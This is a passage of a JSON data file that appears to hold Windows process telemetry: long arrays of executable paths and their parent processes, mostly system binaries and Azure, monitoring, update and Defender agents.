\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 